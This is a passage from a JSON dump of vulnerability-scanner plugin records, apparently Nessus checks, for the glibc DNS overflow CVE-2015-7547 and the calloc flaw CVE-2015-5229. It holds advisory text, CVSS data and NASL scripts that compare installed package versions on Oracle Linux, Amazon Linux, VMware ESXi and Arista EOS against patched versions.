(rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"glibc-common-2.17-106.el7_2.4\")) flag++;\n\n 
if (rpm_check(release:\"RHEL7\", reference:\"glibc-debuginfo-2.17-106.el7_2.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"glibc-debuginfo-common-2.17-106.el7_2.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"glibc-devel-2.17-106.el7_2.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"glibc-headers-2.17-106.el7_2.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"glibc-headers-2.17-106.el7_2.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"glibc-static-2.17-106.el7_2.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"glibc-utils-2.17-106.el7_2.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"glibc-utils-2.17-106.el7_2.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"nscd-2.17-106.el7_2.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"nscd-2.17-106.el7_2.4\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:50:32", "description": "From Red Hat Security Advisory 2016:0176 :\n\nUpdated glibc packages that fix two security issues and two bugs are\nnow available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. 
Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nname service cache daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA stack-based buffer overflow was found in the way the libresolv\nlibrary performed dual A/AAAA DNS queries. A remote attacker could\ncreate a specially crafted DNS response which could cause libresolv to\ncrash or, potentially, execute code with the permissions of the user\nrunning the library. Note: this issue is only exposed when libresolv\nis called from the nss_dns NSS service module. (CVE-2015-7547)\n\nIt was discovered that the calloc implementation in glibc could return\nmemory areas which contain non-zero bytes. This could result in\nunexpected application behavior such as hangs or crashes.\n(CVE-2015-5229)\n\nThe CVE-2015-7547 issue was discovered by the Google Security Team and\nRed Hat. Red Hat would like to thank Jeff Layton for reporting the\nCVE-2015-5229 issue.\n\nThis update also fixes the following bugs :\n\n* The existing implementation of the 'free' function causes all memory\npools beyond the first to return freed memory directly to the\noperating system as quickly as possible. This can result in\nperformance degradation when the rate of free calls is very high. The\nfirst memory pool (the main pool) does provide a method to rate limit\nthe returns via M_TRIM_THRESHOLD, but this method is not available to\nsubsequent memory pools.\n\nWith this update, the M_TRIM_THRESHOLD method is extended to apply to\nall memory pools, which improves performance for threads with very\nhigh amounts of free calls and limits the number of 'madvise' system\ncalls. 
The change also increases the total transient memory usage by\nprocesses because the trim threshold must be reached before memory can\nbe freed.\n\nTo return to the previous behavior, you can either set\nM_TRIM_THRESHOLD using the 'mallopt' function, or set the\nMALLOC_TRIM_THRESHOLD environment variable to 0. (BZ#1298930)\n\n* On the little-endian variant of 64-bit IBM Power Systems (ppc64le),\na bug in the dynamic loader could cause applications compiled with\nprofiling enabled to fail to start with the error 'monstartup: out of\nmemory'. The bug has been corrected and applications compiled for\nprofiling now start correctly. (BZ#1298956)\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues.", "edition": 32, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-17T00:00:00", "title": "Oracle Linux 7 : glibc (ELSA-2016-0176)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5229", "CVE-2015-7547"], "modified": "2016-02-17T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:nscd", "p-cpe:/a:oracle:linux:glibc-devel", "p-cpe:/a:oracle:linux:glibc-utils", "p-cpe:/a:oracle:linux:glibc-static", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:glibc-headers", "p-cpe:/a:oracle:linux:glibc-common", "p-cpe:/a:oracle:linux:glibc"], "id": "ORACLELINUX_ELSA-2016-0176.NASL", "href": "https://www.tenable.com/plugins/nessus/88777", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2016:0176 and \n# Oracle Linux Security Advisory ELSA-2016-0176 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88777);\n script_version(\"2.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-5229\", 
\"CVE-2015-7547\");\n script_xref(name:\"RHSA\", value:\"2016:0176\");\n script_xref(name:\"TRA\", value:\"TRA-2017-08\");\n\n script_name(english:\"Oracle Linux 7 : glibc (ELSA-2016-0176)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2016:0176 :\n\nUpdated glibc packages that fix two security issues and two bugs are\nnow available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nname service cache daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA stack-based buffer overflow was found in the way the libresolv\nlibrary performed dual A/AAAA DNS queries. A remote attacker could\ncreate a specially crafted DNS response which could cause libresolv to\ncrash or, potentially, execute code with the permissions of the user\nrunning the library. Note: this issue is only exposed when libresolv\nis called from the nss_dns NSS service module. (CVE-2015-7547)\n\nIt was discovered that the calloc implementation in glibc could return\nmemory areas which contain non-zero bytes. This could result in\nunexpected application behavior such as hangs or crashes.\n(CVE-2015-5229)\n\nThe CVE-2015-7547 issue was discovered by the Google Security Team and\nRed Hat. 
Red Hat would like to thank Jeff Layton for reporting the\nCVE-2015-5229 issue.\n\nThis update also fixes the following bugs :\n\n* The existing implementation of the 'free' function causes all memory\npools beyond the first to return freed memory directly to the\noperating system as quickly as possible. This can result in\nperformance degradation when the rate of free calls is very high. The\nfirst memory pool (the main pool) does provide a method to rate limit\nthe returns via M_TRIM_THRESHOLD, but this method is not available to\nsubsequent memory pools.\n\nWith this update, the M_TRIM_THRESHOLD method is extended to apply to\nall memory pools, which improves performance for threads with very\nhigh amounts of free calls and limits the number of 'madvise' system\ncalls. The change also increases the total transient memory usage by\nprocesses because the trim threshold must be reached before memory can\nbe freed.\n\nTo return to the previous behavior, you can either set\nM_TRIM_THRESHOLD using the 'mallopt' function, or set the\nMALLOC_TRIM_THRESHOLD environment variable to 0. (BZ#1298930)\n\n* On the little-endian variant of 64-bit IBM Power Systems (ppc64le),\na bug in the dynamic loader could cause applications compiled with\nprofiling enabled to fail to start with the error 'monstartup: out of\nmemory'. The bug has been corrected and applications compiled for\nprofiling now start correctly. 
(BZ#1298956)\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-February/005784.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/17\");\n 
script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-2.17-106.0.1.el7_2.4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-common-2.17-106.0.1.el7_2.4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-devel-2.17-106.0.1.el7_2.4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-headers-2.17-106.0.1.el7_2.4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-static-2.17-106.0.1.el7_2.4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-utils-2.17-106.0.1.el7_2.4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"nscd-2.17-106.0.1.el7_2.4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-static / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-01T01:23:48", "description": "It was discovered that the calloc implementation in glibc could return\nmemory areas which contain non-zero bytes. 
This could result in\nunexpected application behavior such as hangs or crashes.", "edition": 27, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-03-11T00:00:00", "title": "Amazon Linux AMI : glibc (ALAS-2016-660)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5229"], "modified": "2021-04-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:glibc-debuginfo", "p-cpe:/a:amazon:linux:glibc-devel", "p-cpe:/a:amazon:linux:glibc-utils", "p-cpe:/a:amazon:linux:nscd", "p-cpe:/a:amazon:linux:glibc", "p-cpe:/a:amazon:linux:glibc-common", "p-cpe:/a:amazon:linux:glibc-debuginfo-common", "p-cpe:/a:amazon:linux:glibc-static", "cpe:/o:amazon:linux", "p-cpe:/a:amazon:linux:glibc-headers"], "id": "ALA_ALAS-2016-660.NASL", "href": "https://www.tenable.com/plugins/nessus/89841", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2016-660.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(89841);\n script_version(\"2.4\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2015-5229\");\n script_xref(name:\"ALAS\", value:\"2016-660\");\n\n script_name(english:\"Amazon Linux AMI : glibc (ALAS-2016-660)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the calloc implementation in glibc could return\nmemory areas which contain non-zero bytes. 
This could result in\nunexpected application behavior such as hangs or crashes.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2016-660.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update glibc' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"glibc-2.17-106.167.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-common-2.17-106.167.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-debuginfo-2.17-106.167.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-debuginfo-common-2.17-106.167.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-devel-2.17-106.167.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-headers-2.17-106.167.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-static-2.17-106.167.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-utils-2.17-106.167.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"nscd-2.17-106.167.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-07T15:21:39", "description": "a. 
glibc update for multiple products.\n\n The glibc library has been updated in multiple products to resolve \n a stack-based buffer overflow present in the glibc getaddrinfo function.\n \n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the identifier CVE-2015-7547.\n\n VMware products have been grouped into the following four\n categories :\n \n I) ESXi and ESX Hypervisor\n Versions of ESXi and ESX prior to 5.5 are not affected because\n they do not ship with a vulnerable version of glibc.\n ESXi 5.5 and ESXi 6.0 ship with a vulnerable version of glibc and\n are affected. \n See table 1 for remediation for ESXi 5.5 and ESXi 6.0.\n \n II) Windows-based products\n Windows-based products, including all versions of vCenter Server \n running on Windows, are not affected.\n\n III) VMware virtual appliances\n VMware virtual appliances ship with a vulnerable version of glibc\n and are affected. \n See table 2 for remediation for appliances.\n \n IV) Products that run on Linux\n VMware products that run on Linux (excluding virtual appliances)\n might use a vulnerable version of glibc as part of the base\n operating system. If the operating system has a vulnerable version\n of glibc, VMware recommends that customers contact their operating\n system vendor for resolution. \n \n WORKAROUND\n\n Workarounds are available for several virtual appliances. These are \n documented in VMware KB article 2144032.\n\n RECOMMENDATIONS\n\n VMware recommends customers evaluate and deploy patches for\n affected products in Table 1 and 2 below as these patches become\n available. 
In case patches are not available, customers are\n advised to deploy the workaround.\n\n Column 4 of the following tables lists the action required to\n remediate the vulnerability in each release, if a solution is\n available.\n\n Table 1 - ESXi\n ==============", "edition": 31, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-25T00:00:00", "title": "VMSA-2016-0002 : VMware product updates address a critical glibc security vulnerability", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7547"], "modified": "2016-02-25T00:00:00", "cpe": ["cpe:/o:vmware:esxi:6.0", "cpe:/o:vmware:esxi:5.5"], "id": "VMWARE_VMSA-2016-0002.NASL", "href": "https://www.tenable.com/plugins/nessus/88954", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from VMware Security Advisory 2016-0002. \n# The text itself is copyright (C) VMware Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88954);\n script_version(\"2.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-7547\");\n script_xref(name:\"TRA\", value:\"TRA-2017-08\");\n script_xref(name:\"VMSA\", value:\"2016-0002\");\n\n script_name(english:\"VMSA-2016-0002 : VMware product updates address a critical glibc security vulnerability\");\n script_summary(english:\"Checks esxupdate output for the patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote VMware ESXi host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"a. 
glibc update for multiple products.\n\n The glibc library has been updated in multiple products to resolve \n a stack-based buffer overflow present in the glibc getaddrinfo function.\n \n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the identifier CVE-2015-7547.\n\n VMware products have been grouped into the following four\n categories :\n \n I) ESXi and ESX Hypervisor\n Versions of ESXi and ESX prior to 5.5 are not affected because\n they do not ship with a vulnerable version of glibc.\n ESXi 5.5 and ESXi 6.0 ship with a vulnerable version of glibc and\n are affected. \n See table 1 for remediation for ESXi 5.5 and ESXi 6.0.\n \n II) Windows-based products\n Windows-based products, including all versions of vCenter Server \n running on Windows, are not affected.\n\n III) VMware virtual appliances\n VMware virtual appliances ship with a vulnerable version of glibc\n and are affected. \n See table 2 for remediation for appliances.\n \n IV) Products that run on Linux\n VMware products that run on Linux (excluding virtual appliances)\n might use a vulnerable version of glibc as part of the base\n operating system. If the operating system has a vulnerable version\n of glibc, VMware recommends that customers contact their operating\n system vendor for resolution. \n \n WORKAROUND\n\n Workarounds are available for several virtual appliances. These are \n documented in VMware KB article 2144032.\n\n RECOMMENDATIONS\n\n VMware recommends customers evaluate and deploy patches for\n affected products in Table 1 and 2 below as these patches become\n available. 
In case patches are not available, customers are\n advised to deploy the workaround.\n\n Column 4 of the following tables lists the action required to\n remediate the vulnerability in each release, if a solution is\n available.\n\n Table 1 - ESXi\n ==============\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.vmware.com/pipermail/security-announce/2016/000320.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-08\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply the missing patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:5.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/22\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"VMware ESX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/VMware/release\", \"Host/VMware/version\");\n script_require_ports(\"Host/VMware/esxupdate\", \"Host/VMware/esxcli_software_vibs\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"vmware_esx_packages.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/VMware/release\")) audit(AUDIT_OS_NOT, \"VMware ESX / ESXi\");\nif (\n !get_kb_item(\"Host/VMware/esxcli_software_vibs\") &&\n !get_kb_item(\"Host/VMware/esxupdate\")\n) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ninit_esx_check(date:\"2016-02-22\");\nflag = 0;\n\n\nif (esx_check(ver:\"ESXi 5.5\", vib:\"VMware:esx-base:5.5.0-3.84.3568722\")) flag++;\n\nif (esx_check(ver:\"ESXi 6.0\", vib:\"VMware:esx-base:6.0.0-1.29.3568940\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:esx_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T22:48:45", "description": "The version of Arista Networks EOS running on the remote device is\naffected by multiple stack-based buffer overflow conditions in the GNU\nlibresolv library, specifically within the send_dg() and send_vc()\nfunctions, when handling DNS responses that trigger a call to the\ngetaddrinfo() function with the AF_UNSPEC or AF_INET6 address family.\nAn unauthenticated, remote attacker can exploit these issues, via a\nspecially crafted DNS response, to cause a denial of service condition\nor the execution of arbitrary code.", "edition": 8, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-02-28T00:00:00", "title": "Arista Networks EOS libresolv Overflow RCE (SA0017)", "type": "nessus", 
"bulletinFamily": "scanner", "cvelist": ["CVE-2015-7547"], "modified": "2018-02-28T00:00:00", "cpe": ["cpe:/o:arista:eos"], "id": "ARISTA_EOS_SA0017.NASL", "href": "https://www.tenable.com/plugins/nessus/107059", "sourceData": "#TRUSTED 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\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107059);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/13\");\n\n script_cve_id(\"CVE-2015-7547\");\n script_bugtraq_id(83265);\n script_xref(name:\"CERT\", value:\"457759\");\n script_xref(name:\"EDB-ID\", value:\"39454\");\n script_xref(name:\"EDB-ID\", value:\"40339\");\n\n script_name(english:\"Arista Networks EOS libresolv Overflow RCE (SA0017)\");\n script_summary(english:\"Checks the Arista Networks EOS version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Arista Networks EOS running on the remote device is\naffected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Arista Networks EOS running on the remote device is\naffected by multiple stack-based buffer overflow conditions in the GNU\nlibresolv library, specifically within the send_dg() and send_vc()\nfunctions, when handling DNS responses that trigger a call to the\ngetaddrinfo() function with the AF_UNSPEC or AF_INET6 address family.\nAn unauthenticated, remote attacker can exploit these issues, via a\nspecially crafted DNS response, to cause a denial of service condition\nor the execution of arbitrary code.\");\n # https://www.arista.com/en/support/advisories-notices/security-advisories/1255-security-advisory-17\n script_set_attribute( attribute:\"see_also\", value:\"http://www.nessus.org/u?050a280a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Arista Networks EOS version 4.13.15M / 4.14.12M / 4.15.5M\nor later. 
